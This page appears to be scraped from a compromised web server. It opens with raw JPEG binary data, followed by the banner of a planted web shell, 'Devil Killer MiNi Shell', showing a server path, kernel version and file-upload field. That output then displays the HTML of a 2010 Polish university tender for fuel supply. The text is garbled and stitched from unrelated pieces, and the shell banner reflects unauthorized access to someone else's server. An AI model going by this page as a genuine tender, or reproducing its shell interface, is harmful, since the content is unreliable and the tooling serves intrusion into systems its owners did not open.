JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20101124/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20101124/334855-N-2010.html

<p class="kh_header"><b>Lublin: Dostawa paliw płynnych na potrzeby Uniwersytetu Przyrodniczego w Lublinie z podziałem na 4 części</b><br>
<b>Numer ogłoszenia: 334855 - 2010; data zamieszczenia: 24.11.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Uniwersytet Przyrodniczy w Lublinie , ul. Akademicka 13, 20-950 Lublin, woj. lubelskie, tel. 081 4456603, 4456073, faks 081 4456730.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.up.lublin.pl/zamowienia</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa paliw płynnych na potrzeby Uniwersytetu Przyrodniczego w Lublinie z podziałem na 4 części.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Dostawa paliw płynnych na potrzeby Uniwersytetu Przyrodniczego w Lublinie z podziałem na 4 części:
część 1 - dostawa paliw płynnych w systemie bezgotówkowych kart paliwowych dla samochodów osobowych i dostawczych Uniwersytetu Przyrodniczego w Lublinie i Wydziału Nauk Rolniczych w Zamościu,
część 2 - dostawa paliw płynnych na potrzeby poszczególnych jednostek organizacyjnych Uniwersytetu Przyrodniczego w Lublinie i Wydziału Nauk Rolniczych w Zamościu,
część 3 - dostawa paliw płynnych na potrzeby Ośrodka Wypoczynkowego Studium Wychowania Fizycznego i Sportu w Piasecznie,
część 4 - dostawa paliw płynnych na potrzeby Łąkarskiej Stacji Dydaktyczno-Badawczej w Sosnowicy.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający w części 1, 2, 3, 4 przewiduje w SIWZ możliwości udzielenia zamówień uzupełniających, stanowiących nie więcej niż 20 % wartości zamówienia podstawowego</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 09.13.21.00-4, 09.13.41.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 36.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wadium w niniejszym postępowaniu wynosi: 
w części 1 - 6 000,00 zł (słownie: sześć tysięcy złotych 00/100),
w części 2 - 4 000,00 zł (słownie: cztery tysiące złotych 00/100),
W części 3, 4 - zamawiający nie wymaga wniesienia wadium.
Wadium może być wnoszone w jednej lub kilku następujących formach:
1) pieniądzu;
2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
3) gwarancjach bankowych;
4) gwarancjach ubezpieczeniowych;
5) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158, z późn. zm.4)</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>posiada aktualną koncesję na prowadzenie działalności gospodarczej w zakresie obrotu paliwami płynnymi</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W części 1 i części 2 - Wykonawca powinien wykazać powinien wykazać się wykonaniem lub wykonywaniem w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie:
- część 1 - co najmniej jedną dostawę paliw w systemie kart bezgotówkowych o wartości minimum 100 000,00 zł brutto każda (słownie: sto tysięcy złotych brutto), 
- część 2 - co najmniej jedną dostawę paliw o wartości minimum 200 000,00 zł brutto każda (słownie: dwieście tysięcy złotych brutto)</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>brak konkretyzacji warunku</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>brak konkretyzacji warunku</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>brak konkretyzacji warunku</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. wypełniony formularz Oferta Wykonawcy zgodnie ze wzorem stanowiącym załącznik nr 5 do  SIWZ,
2. wypełnione załączniki nr 1 i/lub 2 i/lub 3 i/lub 4 *,
3. wykaz wszystkich stacji paliw:
- w części 1 - wykaz wszystkich stacji paliw na terenie Lublinie, Zamościa i w większych miastach Polski czynnych całodobowo, honorujących bezgotówkowe karty paliwowe Wykonawcy, z podaniem ich dokładnej lokalizacji, przy czym Zamawiający wymaga aby Wykonawca posiadał co najmniej 2 stacje w Lublinie i dwie w Zamościu oraz co najmniej jedną w większych miastach Polski, 
- w części 2 - wykaz wszystkich stacji paliw na terenie Lublina, Zamościa z podaniem ich dokładnej lokalizacji oraz godzin pracy, przy czym Zamawiający wymaga aby Wykonawca posiadał co najmniej 2 stacje na terenie Lublina, co najmniej 2 stacje na terenie Zamościa,
- w części 3 - wykaz wszystkich stacji paliw na terenie Piaseczna (woj. lubelskie), a jeżeli Wykonawca nie posiada tam swoich stacji, wykaz wszystkich stacji paliw w najbliższym sąsiedztwie tej miejscowości tj. w odległości do 15 km od Piaseczna (woj. lubelskie),
- w części 4 - wykaz wszystkich stacji paliw na terenie Sosnowicy (woj. lubelskie), a jeżeli Wykonawca nie posiada tam swoich stacji, wykaz wszystkich stacji paliw w najbliższym sąsiedztwie tej miejscowości tj. w odległości do 15 km od Sosnowicy (woj. lubelskie)
4. do części 1 i/lub* 2 - dowód wniesienia wadium,
5. ewentualne pełnomocnictwo</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 60</li>
<li>2 - Opust - 40</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>W przypadku zmiany przepisów dotyczących podatku od towarów i usług, wynagrodzenie, o którym mowa w ust. 2 może ulec zmianie i będzie uzależnione od wysokości nowej stawki podatku VAT  dla przedmiotu umowy</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://szp.up.lublin.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Sekcja ds. Zamówień Publicznych
Uniwersytet Przyrodniczy w Lublinie,
ul. Akademicka 13 pokój 54
20-950 Lublin.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.12.2010 godzina 12:00, miejsce: Sekcja ds. Zamówień Publicznych
Uniwersytet Przyrodniczy w Lublinie,
ul. Akademicka 13 pokój 54
20-950 Lublin.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> dostawa paliw płynnych w systemie bezgotówkowych kart paliwowych dla samochodów osobowych i dostawczych Uniwersytetu Przyrodniczego w Lublinie i Wydziału Nauk Rolniczych w Zamościu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa paliw płynnych w systemie bezgotówkowych kart paliwowych dla samochodów osobowych i dostawczych Uniwersytetu Przyrodniczego w Lublinie i Wydziału Nauk Rolniczych w Zamościu, zgodnie z załącznikiem nr 1 do siwz.
1.	Zamawiający wymaga aby Wykonawca posiadał co najmniej dwie stacje paliw w Lublinie i 2 stacje w Zamościu oraz co najmniej jedną stację w większych miastach Polski, honorujące bezgotówkowe karty paliwowe - czynne całodobowo.
2.	Dostawa paliw odbywać się będzie poprzez tankowanie pojazdów służbowych Zamawiającego, na terenie całego kraju w większych miastach Polski (w tym Zamość i Lublin), w sieci stacji paliwowych honorujących wydane paliwowe karty bezgotówkowe.
3.	W przypadku ewentualnej modernizacji lub czasowego wyłączenia danej stacji (np. dostawa paliwa) położonej najbliżej siedziby Zamawiającego, Zamawiający będzie dokonywał transakcji na innej stacji paliw Wykonawcy położonej najbliżej siedziby stacji modernizowanej.
4.	Zakup paliw odbywać się będzie bezgotówkowo na podstawie wydanych bezpłatnie przez wykonawcę kart paliwowych wyposażonych w mikroprocesor lub pasek magnetyczny. Karta paliwowa musi być zabezpieczona poufnym kodem spełniającym bankowe standardy zabezpieczeń np. KOD PIN.
5.	Karty paliwowe będą ważne przez cały okres obowiązywania umowy (tj. w okresie 3 lat od dnia podpisania umowy) począwszy od dnia przekazania ich Zamawiającemu.
6.	Na bezgotówkowej karcie paliwowej zakodowane będą co najmniej następujące dane:
- nazwa Zamawiającego
- nr rejestracyjny pojazdu,
- pojemność zbiornika określająca maksymalne jednorazowe tankowanie,
- rodzaj paliwa.
7.	Zamawiający przewiduje 10 sztuk kart paliwowych, które będą wystawione na samochody wymienione w załączniku nr 1 do siwz.
8.	Karty Flotowe wydane zostaną w ciągu 15 dni roboczych po podpisaniu umowy lub przesłaniu wniosku o wydanie kart.
9.	Zamawiający dopuszcza możliwość, aby po rozstrzygnięciu postępowania przetargowego na korzyść tego z oferentów, którego karty Zamawiający już posiada, możliwe jest odstąpienie od konieczności wydania kart nowych po podpisaniu umowy, na rzecz uaktywnienia kart posiadanych, których data ważności jeszcze nie upłynęła, a następnie wymiana kart po upływie wskazanego na nich terminu w trakcie obowiązywania umowy. W takim przypadku Wykonawca wyda nowe karty oraz karty wznowione (wydawane po upływie terminu ważności kart) w ramach wynagrodzenia Wykonawcy, a duplikat z tytułu zgubienia, zmiany limitu, kradzieży za odpłatnością wg cennika załączonego do oferty.
10.	Cena za pobrane paliwo będzie naliczana każdorazowo według cen obowiązujących dla poszczególnych rodzajów paliw na danej stacji w dniu, w którym zostanie dokonany zakup paliwa, pomniejszona o opust wskazany w ofercie Wykonawcy..
11.	Każda transakcja zakupu przedmiotu zamówienia przez kierowcę Zamawiającego musi być potwierdzona dowodem sprzedaży, sporządzonym przez Wykonawcę np. wydrukiem z kasy lub terminala, zawierającym następujące informacje identyfikacyjne:
- data i dokładny czas przeprowadzenia transakcji,
- numer rejestracyjny pojazdu,
- numer identyfikacyjny bezgotówkowej karty paliwowej,
- ilość i cena zakupionego paliwa,
- adres stacji paliwowej, na której przeprowadzono transakcję.
12.	Faktury zbiorcze wystawiane będą przez Wykonawcę nieodpłatnie, dwa razy w miesiącu:
- za okres od 1 do 15 dnia każdego miesiąca, 
- za okres od 16 do ostatniego dnia każdego miesiąca,
13.	Płatności dokonywane byłyby w ciągu 21 dni od daty ostatniej sprzedaży przy rozliczeniu od 1 do 15 dnia miesiąca i od 16 dnia miesiąca do ostatniego dnia miesiąca - za datę sprzedaży uznaje się ostatni dzień okresu rozliczeniowego, natomiast za datę dokonania płatności przyjmuję się datę uznania rachunku bankowego Wykonawcy.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 09.13.21.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 36.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Opust - 40</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa paliw płynnych na potrzeby poszczególnych jednostek organizacyjnych Uniwersytetu Przyrodniczego w Lublinie i Wydziału Nauk Rolniczych w Zamościu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa paliw płynnych na potrzeby poszczególnych jednostek organizacyjnych Uniwersytetu Przyrodniczego w Lublinie i Wydziału Nauk Rolniczych w Zamościu, zgodnie z załącznikiem nr 2 do siwz.
1.	Zamawiający wymaga aby Wykonawca posiadał co najmniej 2 stacje paliw w Lublinie i 2 stacje w Zamościu.
2.	Dostawa paliw odbywać się będzie poprzez tankowanie do kanistrów/zbiorników paliwowych przez jednostki organizacyjne Uniwersytetu Przyrodniczego w Lublinie i Wydziału Nauk Rolniczych w Zamościu, wymienione w załączniku nr 2 do siwz.
3.	Za dokonany każdorazowy zakup paliwa Wykonawca wystawi Zamawiającemu fakturę VAT, zawierającą następujące informacje identyfikacyjne:
- data i dokładny czas przeprowadzenia transakcji
- nazwa jednostki organizacyjnej dokonującej zakupu paliwa
- ilość i cena zakupionego paliwa
4.	Cena za pobrane paliwo będzie naliczona każdorazowo według cen obowiązujących dla poszczególnych rodzajów paliw na danej stacji w dniu, w którym zostanie dokonany zakup paliwa, pomniejszona o opust.
5.	Termin płatności wynosi 21 dni od dnia wystawienia i dostarczenia faktury VAT. Za datę dokonania płatności przyjmuję się datę uznania rachunku bankowego Wykonawcy.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 09.13.21.00-4, 09.13.41.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 36.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Opust - 40</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Dostawa paliw płynnych na potrzeby Ośrodka Wypoczynkowego Studium Wychowania Fizycznego i Sportu w Piasecznie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa paliw płynnych na potrzeby Ośrodka Wypoczynkowego Studium Wychowania Fizycznego i Sportu w Piasecznie, zgodnie z załącznikiem nr 3 do siwz.
1.	Zamawiający wymaga aby Wykonawca posiadał co najmniej jedną stację paliw na terenie Piaseczna (woj. lubelskie), a jeżeli Wykonawca nie posiada tam swoich stacji, Zamawiający żąda aby stacje paliw Wykonawcy znajdowały się w najbliższym sąsiedztwie tej miejscowości tj. w odległości do 15 km od Piaseczna (woj. lubelskie),
2.	Dostawa paliw odbywać się będzie poprzez tankowanie do kanistrów/zbiorników paliwowych.
3.	Za dokonany każdorazowy zakup paliwa Wykonawca wystawi Zamawiającemu fakturę VAT, zawierającą następujące informacje identyfikacyjne:
- data i dokładny czas przeprowadzenia transakcji
- nazwa jednostki organizacyjnej dokonującej zakupu paliwa
- ilość i cena zakupionego paliwa
4.	Cena za pobrane paliwo będzie naliczona każdorazowo według cen obowiązujących dla poszczególnych rodzajów paliw na danej stacji w dniu, w którym zostanie dokonany zakup paliwa, pomniejszona o opust.
5.	Termin płatności wynosi 21 dni od dnia wystawienia i dostarczenia faktury VAT. Za datę dokonania płatności przyjmuję się datę uznania rachunku bankowego Wykonawcy.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 09.13.21.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 36.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Opust - 40</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Dostawa paliw płynnych na potrzeby Łąkarskiej Stacji Dydaktyczno-Badawczej w Sosnowicy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa paliw płynnych na potrzeby Łąkarskiej Stacji Dydaktyczno-Badawczej w Sosnowicy, zgodnie z załącznikiem nr 4 do siwz.
1.	Zamawiający wymaga aby Wykonawca posiadał co najmniej jedną stację paliw na terenie Sosnowicy (woj. lubelskie), a jeżeli Wykonawca nie posiada tam swoich stacji, Zamawiający żąda aby stacje paliw Wykonawcy znajdowały się w najbliższym sąsiedztwie tej miejscowości tj. w odległości do 15 km od Sosnowicy (woj. lubelskie),
2.	Dostawa paliw odbywać się będzie poprzez tankowanie do kanistrów/zbiorników paliwowych.
3.	Za dokonany każdorazowy zakup paliwa Wykonawca wystawi Zamawiającemu fakturę VAT, zawierającą następujące informacje identyfikacyjne:
- data i dokładny czas przeprowadzenia transakcji
- nazwa jednostki organizacyjnej dokonującej zakupu paliwa
- ilość i cena zakupionego paliwa
